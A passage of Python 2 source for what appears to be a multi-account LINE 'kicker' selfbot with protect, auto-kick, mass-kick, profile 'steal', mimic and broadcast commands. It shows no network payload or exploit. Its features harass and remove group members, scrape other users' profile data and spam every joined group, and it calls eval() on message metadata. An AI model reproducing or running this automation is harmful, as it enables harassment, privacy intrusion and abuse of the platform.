ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = True
ki7.updateGroup(X)
Ticket = ki7.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid8 in op.param3:
if op.param2 in Bots:
pass
try:
ki9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = True
ki8.updateGroup(X)
Ticket = ki8.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid9 in op.param3:
if op.param2 in Bots:
pass
try:
ki10.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ticket = ki9.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid10 in op.param3:
if op.param2 in Bots:
pass
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = True
ki10.updateGroup(X)
Ticket = ki10.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
# op.type 13: this account received a group invitation.
if op.type == 13:
# Only react when our own mid is among the invitees (op.param3).
if mid in op.param3:
# "pautoJoin" toggles auto-accepting group invitations.
if wait["pautoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
# op.type 22: invited into a room (multi-user chat); leave if configured.
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
# op.type 24: joined a room; same auto-leave behaviour as type 22.
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to, "error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
cl.sendText(msg.to, "[ChatBOT] " + data['result']['response'].encode('utf-8'))
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = [cName + "\n" + str(wait["tag1"]) , cName + "\n" + str(wait["tag2"])]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy",cName + ""]
ret_ = "[Auto] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
msg.contentType = 7
msg.text = ''
msg.contentMetadata = {
'STKPKGID': '9662',
'STKTXT': '[]',
'STKVER': '16',
'STKID':'697'
}
cl.sendMessage(msg)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy",cName + " Ngapain Ngetag?",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja","-_-","Alin lagi off", cName + " Kenapa Tag saya?","SPAM PC aja " + cName, "Jangan Suka Tag gua " + cName, "Kamu siapa " + cName + "?", "Ada Perlu apa " + cName + "?","Tenggelamkan tuh yang suka tag pake BOT","Tersummon -_-"]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait["steal"] == True:
_name = msg.contentMetadata["displayName"]
copy = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
print "[Target] Stealed"
break
else:
targets.append(copy)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
wait["steal"] = False
break
except:
pass
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Done already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done done aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + "")
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Help2"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage2 + "")
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Help3"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage3 + "")
else:
cl.sendText(msg.to,helpt)
cl.sendText(msg.to,helpt)
elif ("Gn:" in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick:" in msg.text:
midd = msg.text.replace("Kick:"," ")
klist=[ki3,ki2,ki1,ki,cl]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[midd])
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ == admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki1.findAndAddContactsByMid(invite)
ki1.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
if msg.contentType == 13:
if wait['ainvite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki1.sendText(msg.to, _name + " สมาชิกอยู่ในกลุ่มเเล้ว")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki1.findAndAddContactsByMid(target)
ki1.inviteIntoGroup(msg.to,[target])
ki1.sendText(msg.to,"Invite " + _name)
wait['ainvite'] = False
break
except:
ki1.sendText(msg.to,"Error")
wait['ainvite'] = False
break
if msg.contentType == 13:
if wait['binvite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki2.sendText(msg.to, _name + " สมาชิกอยู่ในกลุ่มเเล้ว")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki2.findAndAddContactsByMid(target)
ki2.inviteIntoGroup(msg.to,[target])
ki2.sendText(msg.to,"Invite " + _name)
wait['binvite'] = False
break
except:
ki2.sendText(msg.to,"Error")
wait['binvite'] = False
break
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif msg.text.lower() == 'mybot':
msg.contentType = 13
msg.contentMetadata = {'mid': Amid1}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid2}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid3}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid4}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid5}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid6}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid7}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid8}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid9}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid10}
cl.sendMessage(msg)
elif msg.text.lower() == '#mybot':
msg.contentType = 13
msg.contentMetadata = {'mid': Amid1}
ki1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid2}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid3}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid4}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid5}
ki5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid6}
ki6.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid7}
ki7.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid8}
ki8.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid9}
ki9.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid10}
ki10.sendMessage(msg)
elif "me" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'yt ' in msg.text:
try:
textToSearch = (msg.text).replace('yt ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
elif msg.text in ["55","555"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
ki6.sendMessage(msg)
ki7.sendMessage(msg)
ki8.sendMessage(msg)
ki9.sendMessage(msg)
ki10.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
ki2.sendMessage(msg)
elif "youname " in msg.text.lower():
txt = msg.text.replace("youname ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Bl " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Done Banned")
print "[Command] Bannad"
except:
pass
#===========================================
#----------------------------------------------------------------------------
#------------------------------- UNBAN BY TAG -------------------------------
elif "Wl " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Done Unbanned")
print "[Command] Unbannad"
except:
pass
# elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
# text = msg.text
# if text is not None:
# cl.sendText(msg.to,text)
# else:
# if msg.contentType == 7:
# msg.contentType = 7
# msg.text = None
# msg.contentMetadata = {
# "STKID": "6",
# "STKPKGID": "1",
# "STKVER": "100" }
# cl.sendMessage(msg)
# elif msg.contentType == 13:
# msg.contentType = 13
# msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
# cl.sendMessage(msg)
elif "Mimic:" in msg.text:
if msg.from_ in admin:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on\n\nเปิดการเลียนเเบบ")
else:
cl.sendText(msg.to,"Mimic already on\n\nเปิดการเลียนเเบบ")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off\n\nปิดการเลียนเเบบ")
else:
cl.sendText(msg.to,"Mimic already off\n\nปิดการเลียนเเบบ")
elif "add:" in cmd:
target0 = msg.text.replace("Mimic:add:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets\n\nเกิดผิดพลาด")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"โปรเเกรมเลียนเเบบทำงาน")
break
elif "del:" in cmd:
target0 = msg.text.replace("Mimic:del:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets\n\nเกิดข้อผิดพลาด")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"คุณลบการเลียนเเบบผู้ใช้นี้")
break
elif cmd == "list":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<List Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n-> " + cl.getContact(a).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal: " + total)
#----------------------------------------------------------------------------
elif msg.text.lower() in ["botkill"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
ki1.kickoutFromGroup(msg.to,[jj])
pass
elif msg.text.lower() in ["admins","mee","creator"]:
msg.contentType = 13
adm = 'u65224f4e8812136f01b25275a54b5aef'
msg.contentMetadata = {'mid': adm}
cl.sendMessage(msg)
cl.sendText(msg.to,"Add Line http://line.me/ti/p/arif.mh")
cl.sendText(msg.to,"👆 สนใจ mybot ทักมาคุย กันได้นะครับ 👆")
#=========================================
elif msg.text in ["ของขวัญ","Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["kick1 gift","Gift 1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki1.sendMessage(msg)
elif msg.text in ["kick2 gift","Gift 2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["kick3 gift","Gift 3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot3 Gift","3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["kick4 gift","Gift 4"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["kick5 gift","Gift 5"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki5.sendMessage(msg)
elif msg.text in ["kick6 gift","Gift 6"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
ki6.sendMessage(msg)
elif msg.text in ["kick7 gift","Gift 7"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
ki7.sendMessage(msg)
elif msg.text in ["kick8 gift"," Gift 8"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '9'}
msg.text = None
ki8.sendMessage(msg)
elif msg.text in ["kick9 gift","Gift 9"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
ki9.sendMessage(msg)
elif msg.text in ["kick10 gift","Gift 10"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '11'}
msg.text = None
ki10.sendMessage(msg)
#====================================================
#VPS STUFF - VPS NEEDED TO RUN THIS COMMAND :)
elif msg.text in ["vps","kernel","Vps"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-svmo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel)
print "[Command]Kernel executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif "Group creator" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"old user")
elif 'ytmp3 ' in msg.text:
try:
textToSearch = (msg.text).replace('ytmp3 ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
# "#set" — record a read-point for this chat so "#read" can later report
# who has read past this message.
elif "#set" in msg.text:
cl.sendText(msg.to, "Let's see who lazy to type")
# Drop any previous read-point state for this chat before re-arming.
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
# Anchor the read-point at this command's message id.
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
# Timestamp used by "#read" when reporting.
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
# ROM: per-chat map of readers seen since the read-point was set.
wait2['ROM'][msg.to] = {}
print wait2
elif "#read" in msg.text:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "people who reading%s\n is this\n\n\nDate and time I started it:\n[%s]" % (wait2['readMember'][msg.to],setTime[msg.to]))
else:
cl.sendText(msg.to, "read point not set\nReading point setting you send it it will send an esxisting one")
elif msg.text in ["Myginfoid","Ginfo"]:
gid = cl.getGroupIdsJoined()
g = ""
for i in gid:
g += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,g)
elif msg.text in ["P1 invite","P1 Invite"]:
wait["ainvite"] = True
ki1.sendText(msg.to,"Send Contact")
elif msg.text in ["P2 invite","P2 Invite"]:
wait["binvite"] = True
ki2.sendText(msg.to,"Send Contact")
#==================================================
elif "notice:" in msg.text:
bctxt = msg.text.replace("notice:", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif msg.text.lower() == 'bann':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
